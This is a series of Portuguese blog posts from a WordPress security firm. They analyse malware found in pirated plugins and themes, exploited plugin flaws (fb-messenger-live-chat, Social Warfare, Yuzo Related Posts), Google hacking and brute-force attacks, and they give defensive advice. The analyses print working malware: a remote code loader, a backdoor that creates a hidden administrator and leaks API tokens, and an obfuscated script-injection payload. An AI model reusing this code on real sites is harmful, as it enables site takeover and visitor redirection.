Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.

Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:

A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:

Em uma rápida analise o código acima faz:

• Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.
• Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.
• Envia informações do site (URL e data) para um servidor externo (llllll.my).
• Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.
• Carrega código remoto de outro servidor (panel.hac…..) sempre que o site é acessado.
• Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.
• Se instala de forma persistente, dificultando a detecção e remoção.

Então resolvemos instalar o plugin e analisar o comportamento.

Após o pluign instalado o que olhamos primeiro é a tabela de usuários

Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:

Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:

Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.

Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.

Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:

Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.

O post Plugins Piratas – Análise técnica apareceu primeiro em ETH SECURITY.

Conceito:

Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele faz isso? Imagine que você vai até uma cidade desconhecida e tem um amigo que mora lá há alguns anos, você precisa se deslocar até certos lugares que não conhece, então você pergunta a esse amigo onde esses lugares ficam e ele te instrui corretamente a melhor maneira de como encontrar os lugares, como isso é possível? Porque ele já esteve lá antes, o Google trabalha dessa mesma maneira, ele sabe o conteúdo dos sites porque já esteve la antes, já os visitou e indexou em seu banco de dados com os seus bots, seus buscadores que indexam os sites e os resultados são organizados em sua base de dados para que sejam mostrados nas pesquisas.

Controlando a indexação:

Existe uma maneira de você controlar o que o Google e outros buscadores indexam em seu site, no arquivo robots.txt você pode definir os buscadores que poderão enxergar em seu site e o que poderão indexar, para que somente o conteúdo público seja mostrado.

Perigos:

Assim como o Google indexa suas páginas ele também pode indexar tudo o que está na raiz de seu site, onde estão os scripts que fazem o mesmo funcionar, através desta técnica de busca é possível encontrar endereços em que seus administradores deixaram arquivos que oferecem um grande risco a segurança, usando como exemplo do WordPress existem 3 grandes perigos.

Backups da base de dados:

Uma base de dados na raiz do site fica disponível para download com várias informações críticas de segurança, as mais críticas são o usuário e o hash da senha, com essas informações em mãos um terceiro mal intencionado pode fazer um ataque de bruteforce no hash e conseguir acesso à área administrativa de seu WordPress.

Backup compactado de seus arquivos:

Da mesma maneira que alguém encontra  um arquivo .sql com o Google Hacking, é possível encontrar arquivos compactados, como o zip ou tar.gz, no caso do WordPress dentro desse arquivo compactado estará o wp-config.php, expondo assim o usuário e senha do banco de dados, fazendo com que seja possível acessar o mesmo e alterar a senha ou adicionar um novo usuário administrador.

WordPress sem o wp-config.php configurado:

Este é o mais perigoso entre eles, pois caso você deixe uma instalação do WordPress em branco em seu docummet root, invasores buscarão por essa falha e quando a encontrarem  farão uma nova instalação do WordPress utilizando uma base de dados externa, dando-lhe total acesso administrativo para upload de backdoors, páginas de phsihing e outros tipos de pragas virtuais que assolam vários sites pelo mundo.

Conclusão:

Com isso vemos que é preciso deixar somente o necessário na raiz de seu site e evitar deixa-lo como repositório para evitar surpresas desagradáveis, caso tenham algum dúvida sobre o conteúdo fiquem a vontade para se expressar nos comentários.

O post Proteja seu site: Como evitar o Google Hacking. apareceu primeiro em ETH SECURITY.

Recentemente foi publicada uma falha de Cross Site Scripting (XSS) no plugin Live Chat with Facebook Messenger conforme citado em nosso blog parceiro, essa falha está sendo amplamente explorada na internet, visto que está instalado em mais de 30.000 sites WordPress.

A falha:

Por razões de funcionalidade o plugin permite a  alteração de opções na tabela de configurações do WordPress, a wp_options, porém a falta de uma proteção adequada permite que a opção ztb_domainid seja alterada e assim redirecionando o site para outros domínios maliciosos.

Como é possível ver no trecho de código abaixo, as opções wp_ajax_update_zb_fbc_code(para usuários autenticados) e wp_ajax_nopriv_update_zb_fbc_code(para usuários não autenticados),  usam a mesma função “ update_zb_fbc_code“, Assim, permitindo que qualquer usuário (logado ou não) modifique as configurações do plugin.

154 add_action(“wp_ajax_update_zb_fbc_code”, “update_zb_fbc_code”); 155 add_action(“wp_ajax_nopriv_update_zb_fbc_code”, “update_zb_fbc_code”);

Juntando isso ao fato da função insert_zb_fbc_code abaixo não possuir checagem de privilégios para evitar problemas de segurança, a falha pode ser facilmente explorada:

157 function update_zb_fbc_code(){
158	header('Access-Control-Allow-Origin: *');
159   header('Access-Control-Allow-Credentials: true');
160	$domain = addslashes($_REQUEST['domain']);
161	$public_key = addslashes($_REQUEST['access']);
162	$id = intval($_REQUEST['customer']);
163	$zbEmail = addslashes($_REQUEST['email']);
164	if(!isset($domain) || empty($domain)){
165		header("Location: ".admin_url()."admin.php?page=zb_fbc");
166	}else{
167		update_option( 'ztb_domainid', $domain );
168		update_option( 'ztb_access_key', $public_key );
169		update_option( 'ztb_id', $id );
170		update_option( 'ztb_email', $zbEmail );
171		update_option( 'ztb_status_disconnect', 2 );
172		wp_send_json( array(
173			'error' => false,
174			'message' => 'Update Zotabox embedded code successful !' 
175			)
176		);
177	}
178 }

Atualização:

Fizemos o teste na versão 1.4.9 e a falha foi devidamente sanada, sendo assim se você utiliza esse plugin o atualize o mais rápido possível.

Caso esteja com seu site redirecionando e não sabe como resolver entre em contato conosco para ajuda especializada.

O post Vulnerabilidade sendo explorada no plugin fb-messenger-live-chat apareceu primeiro em ETH SECURITY.

Agora imagine que você tem a capacidade de tentar várias combinações por segundo, assim como o Superman faria com sua incrível velocidade, ficaria fácil de descobrir o segredo, o mesmo se dá hoje com as senhas que você insere principalmente na área administrativa de seu site.

Estatísticas:

Uma empresa de segurança informou em um relatório as senhas mais utilizadas de 2018, e acreditem se quiser segue a lista das 25 primeiras:

• 1. 123456
• 2. password
• 3. 123456789
• 4. 12345678
• 5. 12345
• 6. 111111
• 7. 1234567
• 8. sunshine
• 9. qwerty
• 10. iloveyou
• 11. princess
• 12. admin
• 13. welcome
• 14. 666666
• 15. abc123
• 16. football
• 17. 123123
• 18. monkey
• 19. 654321
• 20. !@#$%^&*
• 21. charlie
• 22. aa123456
• 23. donald
• 24. password1
• 25. qwerty123

Vemos no topo da lista a nossa campeã de todos os anos 123456, a qual não é preciso nem um ataque de bruteforce para ser quebrada.

Como funciona o ataque:

Primeiramente o que um hacker precisa saber é a URL administrativa de seu site, assim ocorre o primeiro erro dos administradores, não alterar o endereço padrão, no WordPress é wp-admin, no Joomla: administrator, Magento: admin e muitos que fazem sites com programação própria cometem o mesmo erro.

Não pensem que os atacantes fazem esse processo manualmente, existem muitos scanners de vulnerabilidade que possuem a função findadmin, que tenta várias URLs para encontrar o alvo, portanto, encontrar a área administrativa pode não ser uma tarefa difícil.

Encontrado o alvo do ataque vem a hora de adivinhar o usuário, outro grande erro dos administradores, que deixam os padrões como admin, master, administrator etc, inclusive no WordPress é possível encontrar o nome do administrador com uma técnica chamada de enumeração, assunto para os próximos capítulos desse blog.

Com essas informações em mãos o indivíduo pode começar um ataque com várias combinações de senhas, a fim de obter sucesso caso a senha utilizada seja de baixa complexidade.

Existem na internet wordlists com bilhões de senhas, um arquivo de texto pode conter até 5G de tamanho, isso os mais modestos.

O que um ataque pode causar?

Além da possibilidade de seu site ser invadido com essa técnica, são utilizados um grande número de recursos no ataque, fazendo com que seu site fique indisponível, o servidor fique offline ou com que o administrador deste bloqueie seu site a fim de preservar o uptime do host.

Mas, por que um bruteforce consome tantos recursos?

A fim de ilustrar, vamos fazer um login em um site WordPress utilizando a senha errada, veja o quanto de recursos de CPU consome somente a página de login:

O processo funciona da seguinte maneira, as senhas ficam criptografadas no banco de dados, como não existe criptografia reversa para esse tipo de hash, o servidor precisa criptografar a senha digitada e comparar com o hash da senha no banco de dados com o intuito de validar a mesma. O hashda senha 123456 no WordPress fica no banco de dados dessa maneira:

$1$PIIEnrFJ$/VKH4QNrlTWr7tQCb9YkV0

O hash com somente um caractere alterado difere totalmente, mostrando a segurança desse tipo de criptografia:

12345:

$1$zNkKg4EY$CSks7WAfuICMFS70ZEPYn1

Esse processo de criptografia e comparação de hashs foi idealizado para executar poucas vezes, dessa forma não sobrecarregando o servidor, porém se não controlado, ataques de bruteforces podem realizar mai de 3 tentativas por segundo, tendo a indisponibilidade do site como resultado.

O que você deve fazer?

Para evitar os ataques de bruteforce você deve, primeiramente, ter uma senha forte, desse modo ela não será facilmente obtida através desse tipo de ataque.

Baseando-se no WordPress, o CMS mais utilizado no mundo, recomendamos primeiramente que altere a URL administrativa. Para isso pode-se utilizar vários plugins, como o rename wp-login.php.

Também altere o nome do usuário de admin para outro que você deseje, de difícil dedução, nas configurações do WordPress, em usuários é possível realizar essa ação:

Por último e mais importante, adicione um captcha na área administrativa de seu site, essa é a maior arma contra ataques de bruteforce, pois caso ele não seja feito por quem tenta realizar o login o servidor nem irá realizar a comparação das senhas.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post Ataques de força bruta (bruteforce), como se proteger. apareceu primeiro em ETH SECURITY.

O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:

A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.

Fazendo o teste:

Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:

E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.

Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:

Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no post do Yuzo Related Posts

Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.

Solução:

Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post Vulnerabilidades sendo exploradas no plugin Social Warfare apareceu primeiro em ETH SECURITY.

Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:

./wp-content/themes/twentynineteen/functions.php
./wp-content/themes/twentyseventeen/functions.php
./wp-content/themes/twentysixteen/functions.php
./wp-includes/post.php
./wp-includes/wp-tmp.php
./wp-includes/wp-vcd.php

Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:

elseif ($tmpcontent = @file_get_contents(“http://www. harors .pw/code .php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);

verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:

<script type=”text/javascript” src=”//deloplen .com/ apu.php?zoneid=2542869″ async data-cfasync=”false”></script>
<script src=”//pushqwer .com/ ntfc.php?p=2542872″ data-cfasync=”false” async></script>

Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso “O site a seguir contém conteúdo malicioso ou enganoso”.

Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.

Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:

require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, ‘100010010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘100010010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 100010010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’;
echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; }

Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):

| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |

Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.

Conclusão:

Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.

Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.

O post Por que não utilizar temas e plugins piratas. apareceu primeiro em ETH SECURITY.

Infecção:

Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

O código descriptografado fica dessa maneira:

</style><script language=javascript>var elem = document.createElement(‘script’);

elem.type = ‘text/javascript’;

elem.async = true; elem.src = ‘hxxps://hellofromhony[.]org/counter’;

document.getElementsByTagName(‘head’)[0].appendChild(elem);</script>

Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.

Removendo a infecção:

Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.

Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string “String.fromCharCode(118” ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:

Após isso você verá que o conteúdo foi encontrado na tabela wp_options:

Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.

Contra medida:

Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:

https://wordpress.org/support/topic/remove-this-plugin-immediately/

Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:

RewriteEngine on
ErrorDocument 406 “<head><title>Bad Request!</title></head><body><h1>Blocked by Defensor Web!</h1><p>Hacking Attempt!. </p></body></html>”
RewriteEngine On
RewriteCond %{THE_REQUEST} “POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1” [NC]
RewriteRule .* – [R=406,L]

As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:

https://pastebin.com/GKYBv5Qt

Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post [Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção apareceu primeiro em ETH SECURITY.

Diariamente milhares de sites sofrem algum tipo de infecção. As motivações do invasor e a falha que permitiu a invasão são várias que praticamente merecia um post para cada situação, porém neste primeiro post de nosso site vamos abordar as causas mais comuns e como proteger sua presença online de terceiros mal intencionados.

O que leva alguém a invadir um site?

Como citado acima, existem inúmeros motivos que levam alguém a praticar tal ato ilícito, porém entre os mais comuns estão desafiar seus conhecimentos, quebrar a segurança, sentir se capaz daquilo, a mesma sensação que um montanhista tem quando atinge o pico mais alto de uma montanha, ou de um maratonista ao passar pela linha de chegada.

Existem também, os mais comuns, os que fazem isso para obter vantagem financeira praticando crimes, como hospedagem e envio de phishing, spam e outros malwares para os mais diversos fins, pense, para que comprar uma hospedagem ou um servidor se você pode se aproveitar de falhas de segurança deixadas pelos usuários para hospedar o conteúdo malicioso.

Como o invasor age?

Embora existam casos em que o site foi uma vítima escolhida a dedo, na grande maioria das vezes os ataques são aleatórios e automáticos, para entendermos melhor, imagine as últimas falhas de segurança de algum plugin do WordPress, depois que essa fica conhecida e feito um “exploit” para essa, abordaremos mais sobre esses termos no futuro, porem resumindo, é uma ferramenta que permite a exploração automática da falha de segurança, depois é feito um processo automático que começará a varrer a internet atrás de sites que possuam essa falha, então após explorada com sucesso e que será feito upload de arquivos maliciosos, como o phishing por exemplo.

Outros agem de uma forma diferente, espalham pela internet através de emails falsos um vírus que infecta o computador ou dispositivo móvel de quem o abre, então aquele dispositivo passa a ser monitorado,  quando uma senha de e-mail, ou outro qualquer serviço, como as credenciais da área administrativa de seu site ou painel de controle é utilizada a mesma é interceptada e enviada para quem está por trás da disseminação do malware, dando assim acesso administrativo àquele site para que seja utilizado para as ações anteriormente citadas, até que seja percebida a invasão e as medidas de segurança e desinfecção sejam tomadas.

Como se proteger?

Não é necessário ser um expert em segurança de sites para tomar medidas simples e eficazes na proteção de seu site.

Mantenha seu site sempre, sempre, sempre atualizado, atualizações são para melhorias, correção de bugs e falhas de segurança.

Utilize computadores e dispositivos confiáveis para realizar a administração de seu site.

Mantenha sempre um antivírus funcionando e atualizado em seu computador, fazendo varreduras períodicas

para manter seus dados seguros.

Instale temas e plugins de fontes confiáveis, muitos caem no erro de baixarem de locais que disponibilizam gratuitamente programas pagos e ao instalarem o site e infectado por várias ameaças.

Conclusão.

Não importa para que fim você possui um site, uma loja online, um blog pessoal para compartilhar seus conhecimentos ou experiências, a segurança sempre deve estar no checklist das prioridades para que você possa ficar tranquilo sabendo que seu conteúdo está chegando a seu público alvo de uma forma segura.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post Segurança de sites, uma visão geral. apareceu primeiro em ETH SECURITY.